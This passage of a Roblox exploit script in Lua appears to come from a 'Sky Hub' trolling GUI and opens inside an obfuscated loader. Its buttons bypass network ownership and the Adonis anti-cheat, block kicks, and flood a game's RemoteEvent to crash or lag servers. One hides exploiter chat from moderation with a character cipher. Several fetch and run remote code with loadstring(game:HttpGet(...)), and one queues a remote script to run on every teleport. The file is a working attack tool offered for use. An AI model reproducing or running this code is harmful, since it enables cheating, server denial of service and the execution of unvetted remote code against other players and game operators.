+ 1 net_a = net_d[net_b] net_c[net_a[2]] = net_f[net_a[3]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_c[net_a[3]][net_a[4]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_c[net_a[3]][net_a[4]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_a[3] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_a[3] net_b = net_b + 1 net_a = net_d[net_b] net_e = net_a[2] net_c[net_e](net_g(net_c, net_e + 1, net_a[3])) net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_f[net_a[3]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_f[net_a[3]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_c[net_a[3]][net_a[4]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_c[net_a[3]][net_a[4]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_a[3] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_a[3] net_b = net_b + 1 net_a = net_d[net_b] net_e = net_a[2] net_c[net_e](net_g(net_c, net_e + 1, net_a[3])) net_b = net_b + 1 net_a = net_d[net_b] net_b = net_a[3] end net_b = net_b + 1 end end) end return net_m(true, {}, net_s())() end)(string.byte, table.insert, setmetatable) end }) nets:AddButton({ Title = "Net Bypass 2", Description = "Bypass", Callback = function() game:GetService("RunService").RenderStepped:Connect(function() setsimulationradius(math.huge) end) end }) nets:AddButton({ Title = "Net Bypass 3", Description = "Bypass", Callback = function() --// get network keys local network_keys = {} local function scan_network_keys(table) for index, value in next, table do if islclosure(value) and not is_synapse_function(value) then for index, constant in next, getconstants(value) do if type(constant) == "string" then local cleansed_string, pattern_matched = constant:gsub("%W+", "") if pattern_matched > 0 then network_keys[cleansed_string] = constant end end end scan_network_keys(getprotos(value)) end end end scan_network_keys(getgc()) --// get network module local network_module for index, module in next, getloadedmodules() do if module.Name == "network" then network_module = require(module) break end end --// function to send normally local function bypassed_send(name, ...) return network_module:send(network_keys[name], ...) end --bypassed_send("falldamage", 100) end }) nets:AddButton({ Title = "Net Bypass 4", Description = "Bypass", Callback = function() game["Run Service"].RenderStepped:connect(function() settings().Physics.AllowSleep = false setsimulationradius(math.hugemath.huge,math.hugemath.huge) end) end }) nets:AddButton({ Title = "Net Bypass 5", Description = "Bypass", Callback = function() for i,v in next, game:GetService("Players").LocalPlayer.Character:GetDescendants() do if v:IsA("BasePart") and v.Name ~="HumanoidRootPart" then game:GetService("RunService").Heartbeat:connect(function() v.Velocity = Vector3.new(-30,0,0) end) end end game:GetService("StarterGui"):SetCore("SendNotification", { Title = "Notification"; Text = "Netless Ran"; Icon = "rbxthumb://type=Asset&id=5107182114&w=150&h=150"}) Duration = 16; end }) nets:AddButton({ Title = "Net Bypass 6", Description = "Bypass", Callback = function() local LocalPlayer = game:GetService("Players").LocalPlayer local Heartbeat = game:GetService("RunService").Heartbeat Heartbeat:Connect(function() LocalPlayer.MaximumSimulationRadius = math.huge sethiddenproperty(LocalPlayer, "SimulationRadius", math.huge) end) wait(0.2) for i,v in next, game:GetService("Players").LocalPlayer.Character:GetDescendants() do if v:IsA("BasePart") and v.Name ~="HumanoidRootPart" then game:GetService("RunService").Heartbeat:connect(function() v.Velocity = Vector3.new(-30,0,0) end) end end wait(0.2) local character = game:GetService("Players").LocalPlayer.Character local tools = {} for i, v in pairs(game:GetService("Players").LocalPlayer.Backpack:GetChildren()) do if v:IsA("Tool") then v.Parent = character table.insert(tools,v) end end wait() for i, v in pairs(tools) do v.Parent = game:GetService("Players").LocalPlayer.Backpack end wait(0.1) game:GetService("StarterGui"):SetCore("SendNotification", { Title = "Notification"; Text = "Netless Ran"; Icon = "rbxthumb://type=Asset&id=5107182114&w=150&h=150"}) Duration = 16; end }) local gamesse = Window:AddTab({ Title = "Games", Icon = "globe" }) gamesse:AddButton({ Title = "FE Noob All Auto Rap Battles", Description = "by jxyserr", Callback = function() if game.PlaceId ~= 579955134 then game:GetService("TeleportService"):Teleport(579955134,game:GetService("Players").LocalPlayer) else loadstring(game:HttpGet('https://pastes.io/raw/1priqwpcnv'))(); end end }) gamesse:AddButton({ Title = "FE Crash/Lag Server Fashion Famous", Description = "by Sky/jazminethecooles2001", Callback = function() if game.PlaceId ~= 568350650 then game:GetService("TeleportService"):Teleport(568350650,game:GetService("Players").LocalPlayer) else game:GetService("RunService").RenderStepped:Connect(function() local args = { [1] = "LayeredClothing", [2] = game:GetService("Workspace"):WaitForChild("DressingRoom"):WaitForChild("UGCBoyLayeredClothing"):WaitForChild("Dummy"):WaitForChild("LayeredClothing") } game:GetService("ReplicatedStorage"):WaitForChild("RemoteEvent"):FireServer(unpack(args)) game:GetService("Players").LocalPlayer.Character:FindFirstChild("LayeredClothing"):Destroy() task.spawn(function() game:GetService("RunService").RenderStepped:Connect(function() local args = { [1] = "LayeredClothing", [2] = game:GetService("Workspace"):WaitForChild("DressingRoom"):WaitForChild("UGCBoyLayeredClothing"):WaitForChild("Dummy"):WaitForChild("LayeredClothing") } game:GetService("ReplicatedStorage"):WaitForChild("RemoteEvent"):FireServer(unpack(args)) game:GetService("Players").LocalPlayer.Character:FindFirstChild("LayeredClothing"):Destroy() task.spawn(function() game:GetService("RunService").RenderStepped:Connect(function() local args = { [1] = "LayeredClothing", [2] = game:GetService("Workspace"):WaitForChild("DressingRoom"):WaitForChild("UGCBoyLayeredClothing"):WaitForChild("Dummy"):WaitForChild("LayeredClothing") } game:GetService("ReplicatedStorage"):WaitForChild("RemoteEvent"):FireServer(unpack(args)) game:GetService("Players").LocalPlayer.Character:FindFirstChild("LayeredClothing"):Destroy() task.spawn(function() game:GetService("RunService").RenderStepped:Connect(function() local args = { [1] = "LayeredClothing", [2] = game:GetService("Workspace"):WaitForChild("DressingRoom"):WaitForChild("UGCBoyLayeredClothing"):WaitForChild("Dummy"):WaitForChild("LayeredClothing") } game:GetService("ReplicatedStorage"):WaitForChild("RemoteEvent"):FireServer(unpack(args)) game:GetService("Players").LocalPlayer.Character:FindFirstChild("LayeredClothing"):Destroy() task.spawn(function() game:GetService("RunService").RenderStepped:Connect(function() local args = { [1] = "LayeredClothing", [2] = game:GetService("Workspace"):WaitForChild("DressingRoom"):WaitForChild("UGCBoyLayeredClothing"):WaitForChild("Dummy"):WaitForChild("LayeredClothing") } game:GetService("ReplicatedStorage"):WaitForChild("RemoteEvent"):FireServer(unpack(args)) game:GetService("Players").LocalPlayer.Character:FindFirstChild("LayeredClothing"):Destroy() task.spawn(function() game:GetService("RunService").RenderStepped:Connect(function() local args = { [1] = "LayeredClothing", [2] = game:GetService("Workspace"):WaitForChild("DressingRoom"):WaitForChild("UGCBoyLayeredClothing"):WaitForChild("Dummy"):WaitForChild("LayeredClothing") } game:GetService("ReplicatedStorage"):WaitForChild("RemoteEvent"):FireServer(unpack(args)) game:GetService("Players").LocalPlayer.Character:FindFirstChild("LayeredClothing"):Destroy() end) end) end) end) end) end) end) end) end) end) end) end end }) local Chatwithhackers = Window:AddTab({ Title = "Chat with other exploiters", Icon = "globe" }) Chatwithhackers:AddButton({ Title = "FE Chat with other exploiters", Description = "basically mixed up chinese letters and changes it to english if ur using the script", Callback = function() --[[ Made by Rouxhaver When two people execute the script they can use the text box to chat with each other privately and uncensored Note: only works on the newer bubble chat and not the old one and long messages get tagged ]] a = "的" b = "一" c = "是" d = "不" e = "了" f = "人" g = "我" h = "在" i = "有" j = "他" k = "这" l = "为" m = "之" n = "大" o = "来" p = "以" q = "个" r = "中" s = "上" t = "们" u = "到" v = "说" w = "国" x = "和" y = "地" z = "也" function convert(str) str = str:lower() return str:gsub("a",a):gsub("b",b):gsub("c",c):gsub("d",d):gsub("e",e):gsub("f",f):gsub("g",g):gsub("h",h):gsub("i",i):gsub("j",j):gsub("k",k):gsub("l",l):gsub("m",m):gsub("n",n):gsub("o",o):gsub("p",p):gsub("q",q):gsub("r",r):gsub("s",s):gsub("t",t):gsub("u",u):gsub("v",v):gsub("w",w):gsub("x",x):gsub("y",y):gsub("z",z) end function unconvert(str) str = str:lower() return str:gsub(a,"a"):gsub(b,"b"):gsub(c,"c"):gsub(d,"d"):gsub(e,"e"):gsub(f,"f"):gsub(g,"g"):gsub(h,"h"):gsub(i,"i"):gsub(j,"j"):gsub(k,"k"):gsub(l,"l"):gsub(m,"m"):gsub(n,"n"):gsub(o,"o"):gsub(p,"p"):gsub(q,"q"):gsub(r,"r"):gsub(s,"s"):gsub(t,"t"):gsub(u,"u"):gsub(v,"v"):gsub(w,"w"):gsub(x,"x"):gsub(y,"y"):gsub(z,"z") end function chat(str) game:GetService("ReplicatedStorage").DefaultChatSystemChatEvents.SayMessageRequest:FireServer(str,"All") end player = game:GetService("Players").LocalPlayer SG = Instance.new("ScreenGui",player.PlayerGui) frame = Instance.new("Frame",SG) frame.Size = UDim2.new(0.2,0,0.2,0) frame.AnchorPoint = Vector2.new(0.5,0.5) frame.Position = UDim2.new(0.5,0,0.8,0) frame.Active = true frame.Draggable = true frame.BackgroundColor3 = Color3.new(0.14902, 0.8, 1) textbox = Instance.new("TextBox",frame) textbox.AnchorPoint = Vector2.new(0.5,0.5) textbox.Size = UDim2.new(0.95,0,0.65,0) textbox.Position = UDim2.new(0.5,0,0.6,0) textbox.TextScaled = true textbox.BackgroundColor3 = Color3.new(1,1,1) textbox.Text = "Text" textbox.TextColor3 = Color3.new(0, 0, 0) title = Instance.new("TextLabel",frame) title.Size = UDim2.new(0.3,0,0.3,0) title.TextScaled = true title.Text = "hacker chat" title.BackgroundTransparency = 1 title.TextColor3 = Color3.new(0, 0, 0) closebutton = Instance.new("TextButton",frame) closebutton.Size = UDim2.new(0.15,0,0.25,0) closebutton.AnchorPoint = Vector2.new(1,0) closebutton.TextScaled = true closebutton.BackgroundColor3 = Color3.new(1, 0, 0.0156863) closebutton.Text = "X" closebutton.Position = UDim2.new(1,0,0,0) closebutton.TextColor3 = Color3.new(1, 1, 1) ui = Instance.new("UIAspectRatioConstraint",frame) ui.AspectRatio = 4 closebutton.MouseButton1Up:Connect(function() SG:Destroy() end) textbox.FocusLost:Connect(function() chat("三"..convert(textbox.Text)) end) player.PlayerGui.Chat.Frame.ChatChannelParentFrame.Frame_MessageLogDisplay.Scroller.ChildAdded:Connect(function(msg) wait(1) local message = msg.TextLabel.Text if message:match("三") then msg.TextLabel.TextColor3 = Color3.new(1, 0.85098, 0) message = unconvert(message:gsub("三","")) msg.TextLabel.Text = message end end) Coregui = game:GetService("CoreGui") if Coregui:FindFirstChild("BubbleChat") then Coregui.BubbleChat.DescendantAdded:Connect(function(bubble) wait(1) if bubble:IsA("TextLabel") then if bubble.Text:match("三") then bubble.Parent.BackgroundColor3 = Color3.new(1, 0.85098, 0) bubble.Text = unconvert(bubble.Text:gsub("三","")) end end end) end end }) local acybpass2 = Window:AddTab({ Title = "Bypass AC", Icon = "globe" }) acybpass2:AddButton({ Title = "Anti Kick", Description = "stops local scripts from kicking you", Callback = function() local mt = getrawmetatable(game) setreadonly(mt, false) local oldmt = mt.__namecall mt.__namecall = newcclosure(function(Self, ...) local method = getnamecallmethod() if method == 'Kick' then print("Tried To kick") wait(9e9) return nil end return oldmt(Self, ...) end) setreadonly(mt, true) end }) acybpass2:AddButton({ Title = "Bypass Anti Cheats", Description = "stops from kicking u and anti cheats", Callback = function() loadstring(game:HttpGet("https://raw.githubusercontent.com/ADSKerOffical/AntiCheat/main/Bypass"))() end }) acybpass2:AddButton({ Title = "Bypass Anti Cheats 2", Description = "stops from kicking u and anti cheats", Callback = function() loadstring(game:HttpGet("https://raw.githubusercontent.com/yofriendfromschool1/Sky-Hub-Backup/main/powerfulac.txt"))() end }) acybpass2:AddButton({ Title = "Bypass Adonis/newindex anti cheat", Description = "stops from kicking u and anti cheats", Callback = function() local getinfo = getinfo or debug.getinfo local DEBUG = false local Hooked = {} local Detected, Kill setthreadidentity(2) for i, v in getgc(true) do if typeof(v) == "table" then local DetectFunc = rawget(v, "Detected") local KillFunc = rawget(v, "Kill") if typeof(DetectFunc) == "function" and not Detected then Detected = DetectFunc local Old; Old = hookfunction(Detected, function(Action, Info, NoCrash) if Action ~= "_" then if DEBUG then warn(`Adonis AntiCheat flagged\nMethod: {Action}\nInfo: {Info}`) end end return true end) table.insert(Hooked, Detected) end if rawget(v, "Variables") and rawget(v, "Process") and typeof(KillFunc) == "function" and not Kill then Kill = KillFunc local Old; Old = hookfunction(Kill, function(Info) if DEBUG then warn(`Adonis AntiCheat tried to kill (fallback): {Info}`) end end) table.insert(Hooked, Kill) end end end local Old; Old = hookfunction(getrenv().debug.info, newcclosure(function(...) local LevelOrFunc, Info = ... if Detected and LevelOrFunc == Detected then if DEBUG then warn(`zins | adonis bypassed`) end return coroutine.yield(coroutine.running()) end return Old(...) end)) -- setthreadidentity(9) setthreadidentity(7) end }) acybpass2:AddButton({ Title = "Bypass lagback", Description = "bypasses lagback in most games", Callback = function() local players = game:GetService('Players') local lplr = players.LocalPlayer local lastCF, stop, heartbeatConnection local function start() heartbeatConnection = game:GetService('RunService').Heartbeat:Connect(function() if stop then return end lastCF = lplr.Character:FindFirstChildOfClass('Humanoid').RootPart.CFrame end) lplr.Character:FindFirstChildOfClass('Humanoid').RootPart:GetPropertyChangedSignal('CFrame'):Connect(function() stop = true lplr.Character:FindFirstChildOfClass('Humanoid').RootPart.CFrame = lastCF game:GetService('RunService').Heartbeat:Wait() stop = false end) lplr.Character:FindFirstChildOfClass('Humanoid').Died:Connect(function() heartbeatConnection:Disconnect() end) end lplr.CharacterAdded:Connect(function(character) repeat game:GetService('RunService').Heartbeat:Wait() until character:FindFirstChildOfClass('Humanoid') repeat game:GetService('RunService').Heartbeat:Wait() until character:FindFirstChildOfClass('Humanoid').RootPart start() end) lplr.CharacterRemoving:Connect(function() heartbeatConnection:Disconnect() end) start() end }) InterfaceManager:SetLibrary(Fluent) InterfaceManager:SetFolder("Trollolo") local Settings = Window:AddTab({ Title = "Settings", Icon = "settings" }) InterfaceManager:BuildInterfaceSection(Settings) SaveManager:SetLibrary(Fluent) SaveManager:IgnoreThemeSettings() SaveManager:SetIgnoreIndexes({ 'TextboxIdentifier' }) SaveManager:SetFolder("Trollolo/Configs") local Config = Window:AddTab({ Title = "Config", Icon = "settings" }) SaveManager:BuildConfigSection(Config) SaveManager:LoadAutoloadConfig() Window:SelectTab(1) for i,v in pairs(game:GetService("ReplicatedStorage"):GetDescendants()) do if v.Name == "DestroySegway" or v.Name == "DeleteCar" or v.Name == "HandlessSegway" or v.Name == "Building Tools" or v.Name == "SetNetworkOwnership" or v.Name == "ChangeParent" or v.Name == "despawn" then Fluent:Notify({ Title = "OMG VULN FOUND", Content = "If you dm me in discord: jazminethecooles2001 or post the game u are currently playing in the discord I will give you a role. PLSSS", SubContent = "", -- Optional Duration = 30 -- Set to nil to make the notification not disappear }) end end queueteleport = (syn and syn.queue_on_teleport) or queue_on_teleport or (fluxus and fluxus.queue_on_teleport) queueteleport("loadstring(game:HttpGet('https://raw.githubusercontent.com/yofriendfromschool1/Sky-Hub/main/FE%20Trolling%20GUI.luau'))()")